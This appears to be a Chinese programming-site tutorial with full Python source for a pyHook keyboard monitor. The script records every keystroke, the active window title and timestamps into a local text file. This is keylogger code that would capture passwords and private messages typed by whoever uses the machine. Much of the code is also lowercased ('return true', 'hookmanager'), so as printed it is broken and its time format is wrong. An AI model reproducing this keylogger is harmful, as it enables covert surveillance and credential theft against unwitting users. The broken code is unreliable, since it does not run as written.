欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

python中使用pyhook实现键盘监控的例子

程序员文章站 2022-10-06 15:06:25
pyhook下载: pyhookapi手册: 以上网站上提供了几个使用的例子,另外安装pyhooks后,也会有一个例子的文件。于是拿来学习了一下,第一次运行时,提示没有...

pyhook下载:

pyhookapi手册:

以上网站上提供了几个使用的例子,另外安装pyhooks后,也会有一个例子的文件。于是拿来学习了一下,第一次运行时,提示没有pythoncom模块,就安装了pywin32,安装后,可以正常运行,但是会导致机器发卡,特别是中断程序运行后,鼠标会出现一段时间的*晃动,找了半天原因,感觉主要是事件频率过高,程序会经常卡在pythoncom.pumpmessages()。

网上搜索了半天,看到有一帖子说是pythoncom.pumpmessages(n),n表示延迟时间,于是试着改了下,发现有一定效果,但不明显,后来想是不是因为没有终止程序,才会导致一直很卡呢,于是添加终止程序语句win32api.postquitmessage()。结果还算满意。

# -*- coding: cp936 -*-
import pythoncom 
import pyhook 
import time
import win32api
t=''
asciistr=''
keystr=''
def onkeyboardevent(event):  
  global t,asciistr,keystr
  filename='d://test.txt'
  wrfile=open(filename,'ab')
  "处理键盘事件"
  if t==str(event.windowname):
    asciistr=asciistr+chr(event.ascii)
    keystr=keystr+str(event.key)
    
  else:
    t=str(event.windowname)
    if asciistr=='' and keystr=='':
      wrfile.writelines("\nwindow:%s\n" % str(event.window))
      wrfile.writelines("windowname:%s\n" % str(event.windowname)) #写入当前窗体名
      wrfile.writelines("messagename:%s\n" % str(event.messagename))
      wrfile.writelines("message:%d\n" % event.message)
      wrfile.writelines("time:%s\n" % time.strftime('%y-%m-%d %h:%m:%s',time.localtime()))
    else:
      wrfile.writelines("ascii_char:%s\n" %asciistr)
      wrfile.writelines("key_char:%s\n" %keystr)
      wrfile.writelines("\nwindow:%s\n" % str(event.window))
      wrfile.writelines("windowname:%s\n" % str(event.windowname)) #写入当前窗体名
      wrfile.writelines("time:%s\n" % time.strftime('%y-%m-%d %h:%m:%s',time.localtime()))
    
    asciistr=chr(event.ascii)
    keystr=str(event.key)
  if str(event.key)=='f12': #按下f12后终止
    wrfile.writelines("ascii_char:%s\n" %asciistr)
    wrfile.writelines("key_char:%s\n" %keystr)
    wrfile.close()  
    win32api.postquitmessage()
    
  return true
  
  

if __name__ == "__main__":

  #创建hook句柄 
  hm = pyhook.hookmanager() 

  #监控键盘 
  hm.keydown = onkeyboardevent 
  hm.hookkeyboard() 

  #循环获取消息 
  pythoncom.pumpmessages(10000)